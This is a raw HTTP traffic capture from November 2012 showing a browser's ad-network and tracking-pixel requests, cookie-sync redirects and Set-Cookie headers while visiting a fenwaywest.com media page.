Set-Cookie: F1=BYuspClAAAAAHC/CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 19-Nov-2014 04:17:42 GMT; path=/ 70770769=_50a9b2e6,5812585870,782471^1004220^-20^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 19 Nov 2012 04:17:42 GMT
ntCoent-Length: 485
Content-Encoding: gzip
Content-Length: 321
GET /orbserv/hbpix?pixId=8696 HTTP/1.1

Host: idpix.media6degrees.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 16 Dec 2008 21:07:52 GMT
Etag: &quot;1b40012-2b-45e305a397a00&quot;
Accept-Ranges: bytes
Content-Length: 43
Connection: close
GET /00/72/26/uat_2672.js?ad_size=160x600 HTTP/1.1

Host: ad-cdn.technoratimedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://r1.ace.advertising.com/ctst=1/site=782471/size=160600/u=2/bnum=70770769/wkhr=29/hr=5/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Encoding: gzip
_ontent-Length: 9706
Accept-Ranges: bytes
Date: Mon, 19 Nov 2012 04:17:42 GMT
Etag: &quot;142a1d-25ea-4cbe3a3f0e932&quot;
Last-Modified: Fri, 12 Oct 2012 21:47:55 GMT
Server: ECS (arn/46E5)
Vary: Accept-Encoding
X-Cache: HIT
X-Via: CN-5000
Content-Length: 3727
GET /merge?pid=12&3pid=5858721859426781856 HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=12&amp;3pid=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJyrVjJUslIyMTOwMDCzNLc0MTY3MDQ3NrS0VKoFAFBkBdk%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwNybkNADEMA7BdVKewHH%2FKaofbPekI8ANxEGVjpVbsNvamhAX6q5ycdk4qvHoeCv8FLrQLIw%3D%3D; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Tue, 20 Nov 2012 04:17:42 GMT
Connection: close
GET /site/5969 HTTP/1.1

Host: tags.bluekai.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: bkc=KJpqyXU9LYrRiKcJooDOM9y1ecr94JjeeYMX5iPD4QynQLXJ8mIjpLeyY/k4mCVP7TesO2Wy439T96wG/uRDdL5+3wplSc0xdE9I9BUBn3X=; bklc=50a9b2e4; bko=; bkp1=; bku=DHz99mv03PelwF+4; bkw5=; bkdc=snv; bkst=KJhMR5Mehze9pkYSk8tUU8fljBwv999+7xjh
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;, policyref=&quot;http://tags.bluekai.com/w3c/p3p.xml&quot;
Expires: Tue, 20 Nov 2012 04:17:42 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bkc=KJpqyXU9LYrRiKcJooDOM9y1ecr94JjeeYMX5iPD4QynQLXJ8mIjpLeyY/k4mCVP7TesO2Wy439T96wG/uRy7y7vdfQBk4XKMxI0cXRc9BR2ng1=; expires=Sat, 18-May-2013 04:17:42 GMT; path=/; domain=.bluekai.com bklc=50a9b2e6; expires=Sat, 18-May-2013 04:17:42 GMT; path=/; domain=.bluekai.com bkdc=snv; expires=Wed, 19-Dec-2012 04:17:42 GMT; path=/; domain=.bluekai.com
BK-Server: e4d7
Content-Length: 62
GET /merge?pid=2&3pid=DAB99AEE3491F2DEC8F6049C9413ED9C HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=2&amp;3pid=DAB99AEE3491F2DEC8F6049C9413ED9C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJyrVjJUslIyMTOwMDCzNLc0MTY3MDQ3NrS0VKoFAFBkBdk%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwNyTESgDAIBMC%2FUFtAYCBnF4F8KuPfdds9JHSTOU92BEyDJVQAumj8U%2BsBVrcaZI%2FqnNvZkDDRLiS9H9NMDnw%3D; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Tue, 20 Nov 2012 04:17:42 GMT
Connection: close
GET ///www/delivery/ajs.php?zoneid=95029&username=bloguin&numAds=1&premium=1&eleid=lijit_region_95029&abf=true&tid=95029_1353298662292da37f36c0459&lijit_kw=&cb=70093576076&flv=10.0.45&time=05:17:42&ifr=1&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&od=fenwaywest.com&referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: apr.lijit.com
GET ///www/delivery/ajs.php?zoneid=95029&amp;username=bloguin&amp;numAds=1&amp;premium=1&amp;eleid=lijit_region_95029&amp;abf=true&amp;tid=95029_1353298662292da37f36c0459&amp;lijit_kw=&amp;cb=70093576076&amp;flv=10.0.45&amp;time=05:17:42&amp;ifr=1&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;od=fenwaywest.com&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJyrVjJUslIyMTOwMDCzNLc0MTY3MDQ3NrS0VKoFAFBkBdk%3D
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=UTF-8
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1225
Connection: close
GET /merge?pid=10&3pid=638103774108863402&forward= HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=10&amp;3pid=638103774108863402&amp;forward= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJyrVjJUslIyMTOwMDCzNLc0MTY3MDQ3NrS0VKoFAFBkBdk%3D
HTTP/1.1 302 Found

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=0, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwNybERgEAMA7BdXFPYOBcnrMaxO69WL4QH1Rz2ZsuhYu3igniqPaKTEmfaxRvfDyJpCs8%3D; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/; domain=.lijit.com
Expires: Mon, 19 Nov 2012 04:17:42 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
GET /merge?pid=3&3pid=50a9b2e2-9d68-d676-6901-3c5fafca2592 HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=3&amp;3pid=50a9b2e2-9d68-d676-6901-3c5fafca2592 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJyrVjJUslIyMTOwMDCzNLc0MTY3MDQ3NrS0VKoFAFBkBdk%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwNycsRgDAIBcBeOMsMnwB5dhMT04Rj77rXfUjppJbSJVFoXqLlCtBB%2Fk%2FIwGW3MVZ2XlnJCVH2GXvsOSxg9H4cqxBI; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Tue, 20 Nov 2012 04:17:42 GMT
Connection: close
GET /merge?pid=13&3pid=50a9b2e6448a550dd77e72ed HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=13&amp;3pid=50a9b2e6448a550dd77e72ed HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJyrVjJUslIyMTOwMDCzNLc0MTY3MDQ3NrS0VKoFAFBkBdk%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwNycERgDAIBMBe7u0DEuCC3cSBKjL2rvvdA8UNC1kSybRJUU7NxAWdf7nsfEaH2druUkU2RxfeD3xNDcE%3D; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Tue, 20 Nov 2012 04:17:42 GMT
Connection: close
GET /lijit_sync HTTP/1.1

Host: ca.lijit.pixel.invitemedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uid=db273952-68a4-4097-8df2-7d98b16e5711; dp_rec=&quot;{\&quot;4\&quot;:1353298658}&quot;; camp_freq_p1=&quot;eJzjkuH4sJFfgFHi6dNlrawKjBpPO9a0showWoD5AKFUC1E=&quot;; impressions_p1=&quot;eJzjcuRgF1JxMzE3Mbdwc9G1sDB00zUxNnHTtTA2NtAFYiMjN3NjC2MDZ4mnT5e1siq0/ynQmPWbw6B3HavFcu2InoeMAA+dE2s=&quot;; io_freq_p1=&quot;eJzjkuF4eYtRgFHi6dNlrawKjBpPO9a0showWoD5AKNjC2U=&quot;; exchange_uid=&quot;eyI0IjpbIkNBRVNFRTVDZDRSaHR5TE94NXphdWVqdUxVTSIsNzM0ODI2XX0=&quot;; partnerUID=&quot;eyI4NCI6WyJ1cEVmVUk2NTk5T0tydmt4Iix0cnVlXX0=&quot;
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Mon, 19 Nov 2012 04:17:42 GMT
Pragma: no-cache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC&quot;
Cache-Control: no-cache
Location: http://ce.lijit.com/merge?3pid=db273952-68a4-4097-8df2-7d98b16e5711&amp;pid=11
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)
Set-Cookie: impressions=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT clicks=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT segments=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT io_frequency=;Path=/;Domain=invitemedia.com;Expires=Thu, 01-Jan-1970 00:00:01 GMT
GET /adserver/ako?rsi_random=406595164&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=A7798C53EBE3A118D71E950376C2B010&rsi_width=300&rsi_height=250&rsi_secure=0&rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html&rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_title=&rsi_inf=1 HTTP/1.1

Host: ads.revsci.net
GET /adserver/ako?rsi_random=406595164&amp;rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&amp;rsi_site=A7798C53EBE3A118D71E950376C2B010&amp;rsi_width=300&amp;rsi_height=250&amp;rsi_secure=0&amp;rsi_url=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html&amp;rsi_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;rsi_title=&amp;rsi_inf=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: rsiPus_AAAA=&quot;MLtPrc98cF5/JjEy+8IwTsupVEgsLmeT3lsZNcNA4DLJSFos5FKsMmdLWRrDDt9GIKJTfMMm90oD9QpUg7ib1Y2QoxY+jd4c0r2PVwV7m2Rh95t0DVqpUG0Db/4UbnxBoH+vprPISgO6vys2RFMxm6hwpY8DDQ==&quot;
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref=&quot;http://js.revsci.net/w3c/rsip3p.xml&quot;, CP=&quot;NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA&quot;
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsiPus_AAAA=&quot;&quot;; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver rsiPus_AAAA=&quot;&quot;; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ rsiPus_AAAA=&quot;MLtPrU9zcF5/JSEK3XVPe5IJH/fz0lXtzcWUFYAGSzfD+e9B+mage41HAYCxZJX+rhIHzbtI/haFQKUKqxl3z6yis9zwSuPzlI568MN4oyRBAmtifgmiYGbESKQzFcq16SN0LAi6/WwtTCNNIOzJWJFvxqACeA==&quot;; Version=1; Domain=.revsci.net; Max-Age=63072000; Path=/
Location: http://adnxs.revsci.net/imp?Z=300x250&amp;s=653070&amp;r=0&amp;_salt=115542970&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:42 GMT
GET /imp?Z=300x250&s=653070&r=0&_salt=115542970&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html HTTP/1.1

Host: adnxs.revsci.net
GET /imp?Z=300x250&amp;s=653070&amp;r=0&amp;_salt=115542970&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: rsiPus_AAAA=&quot;MLtPrU9zcF5/JSEK3XVPe5IJH/fz0lXtzcWUFYAGSzfD+e9B+mage41HAYCxZJX+rhIHzbtI/haFQKUKqxl3z6yis9zwSuPzlI568MN4oyRBAmtifgmiYGbESKQzFcq16SN0LAi6/WwtTCNNIOzJWJFvxqACeA==&quot;
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Date: Mon, 19 Nov 2012 04:17:42 GMT
Content-Length: 704
GET /activity?_o=62795&_t=cm_cntxtweb HTTP/1.1

Host: m.xp1.ru4.com
GET /activity?_o=62795&amp;_t=cm_cntxtweb HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 19 Nov 2012 04:17:42 GMT
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NON DSP COR PSAa OUR STP UNI&quot;
Pragma: no-cache
Set-Cookie: X1ID=BM-00000003256334509; domain=.ru4.com; path=/; expires=Sun, 18-May-2014 23:17:42 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=531292&amp;ev=BM-00000003256334509&amp;rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DBM-00000003256334509
Content-Length: 0
X-Cnection: close
GET /imp?anmember=514&anprice=80&Z=300x250&s=1651067&r=0&_salt=698192661&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&u=http://fenwaywest.com/media/index.php&SIG=10v8trh4u;x-cookie=4yrt2nu8nwpa5&o=3&f=05 HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=80&amp;Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=698192661&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;u=http://fenwaywest.com/media/index.php&amp;SIG=10v8trh4u;x-cookie=4yrt2nu8nwpa5&amp;o=3&amp;f=05 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: testbounce=testing; BX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323; uid=uid=0faa594a-3200-11e2-a63c-3c4a92f73a52&amp;_hmacv=1&amp;_salt=2355797717&amp;_keyid=k1&amp;_hmac=88d94038a1661dd49604c657f05bcd10198581d9; RMBX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0025.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 19 Nov 2012 04:17:42 GMT
Expires: Mon, 19 Nov 2012 04:17:42 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /orbserv/hbpix?pixId=5392 HTTP/1.1

Host: idpix.media6degrees.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 16 Dec 2008 21:07:52 GMT
Etag: &quot;3c8172-2b-45e305a397a00&quot;
Accept-Ranges: bytes
Content-Length: 43
Connection: close
GET /ptj?member=514&size=300x250&referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html&inv_code=653070&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D653070%26r%3D0%26_salt%3D115542970%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html HTTP/1.1

Host: ib.adnxs.com
